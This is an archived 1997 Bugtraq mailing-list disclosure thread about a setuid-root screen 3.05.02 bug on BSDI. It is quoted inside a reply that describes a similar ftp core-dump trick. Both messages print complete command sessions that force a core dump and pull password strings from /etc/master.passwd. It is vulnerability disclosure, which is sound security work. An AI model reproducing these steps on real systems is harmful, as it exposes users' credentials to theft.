[4048] in bugtraq
Re: screen 3.05.02
daemon@ATHENA.MIT.EDU (owner-bugtraq@NETSPACE.ORG)
Sun Feb 16 15:29:14 1997
From: <owner-bugtraq@NETSPACE.ORG>
Date: Sat, 15 Feb 1997 21:18:56 -0800
To: BUGTRAQ@NETSPACE.ORG
This exploit is very similer to the FTP exploit on BSD that creates a
ftp.core file you can then strings and get the encrypted password file.
#ftp foobar.com
Welcom to foobar.com ftp site
blah blah blah
please enter login name> evil
that user requires a password> evil2
User evil loged in welcome to foobar.com!
Remote set to type BIN
200>
(now hit ^Z to suspend the process)
#ps
PID TT STAT TIME COMMAND
9526 p0 Ss 0:00.12 -csh (csh)
9539 p0 R+ 0:00.02 ps
1000 p0 Ss 0:00.22 ftp
(get the PID number to the ftp process)
#kill -11 1000
(kill the process)
#fg
(bring the ftp back to the foreground)
Process Killed Core Dump (blah blah)
#ls
home mail public_html ftp.core
#strings ftp.core > test
#pico test
I know this is an older hole, but what the hell, it still works on BDS!
Bronc Buster
bbuster@succeed.net
www2.succeed.net/~bbuster
>THe program under question is /usr/contrib/bin/screen (BSDI). This is
>screen version 3.05.02 and is installed setuid root, as it is "supposed"
>to be. Here is a demonstration:
>
>$ screen
>
>Screen version 3.05.02 (FAU) 19-Aug-93
>
>Copyright (c) 1993 Juergen Weigert, Michael Schroeder
>Copyright (c) 1987 Oliver Laumann
>
>This program is free software; you can redistribute it and/or modify it under
>the terms of the GNU General Public License as published by the Free Software
>Foundation; either version 2, or (at your option) any later version.
>
>This program is distributed in the hope that it will be useful, but WITHOUT
>ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
>FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
>
>You should have received a copy of the GNU General Public License along with
>this program (see the file COPYING); if not, write to the Free Software
>Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
>
>Send bugreports, fixes, enhancements, t-shirts, money, beer & pizza to
>screen@uni-erlangen.de (bah.. send them to Bugtraq!)
>
> [Press Space or Return to end.]
>
>$ screen
>
>$ cd /tmp/screens/S-khelbin
>$ ls
>246.ttyp7.comet
>$ mv 246.ttyp* 246.ttyp7.cometanonymousanonymousanonymousanonymous\
>> anonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous\
>> anonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous
>$ screen -ls
>/tmp/screens/S-khelbin/246.ttyp7.cometanonymousanonymousanonymousanonymousa
nonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanony
mousanonymousanonymousanonymousanonymousanonymousanonymousanonymous:
connect: Invalid argument
>%1 278 Abort - core dumped screen -ls
>$ ls -l
>total 176
>srwx------ 1 khelbin khelbin 0 Feb 15 21:33
246.ttyp7.cometanonymousanonymousanonymousanonymousanonymousanonymousanonymo
usanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousan
onymousanonymousanonymousanonymousanonymous
>-rw-r--r-- 1 khelbin khelbin 172032 Feb 15 21:33 core.screen
>$ strings core.screen|less
>
>
>The core.screen file contains unencrypted password strings from
>/etc/master.passwd, which of course, should not be readable by me. I'm
>also sure there's a buffer-overflow here but I havn't had as much time as
>I would like to to look through the source yet.
>
>
> -khelbin / 9x
> email: khelbin@connix.com
>
>
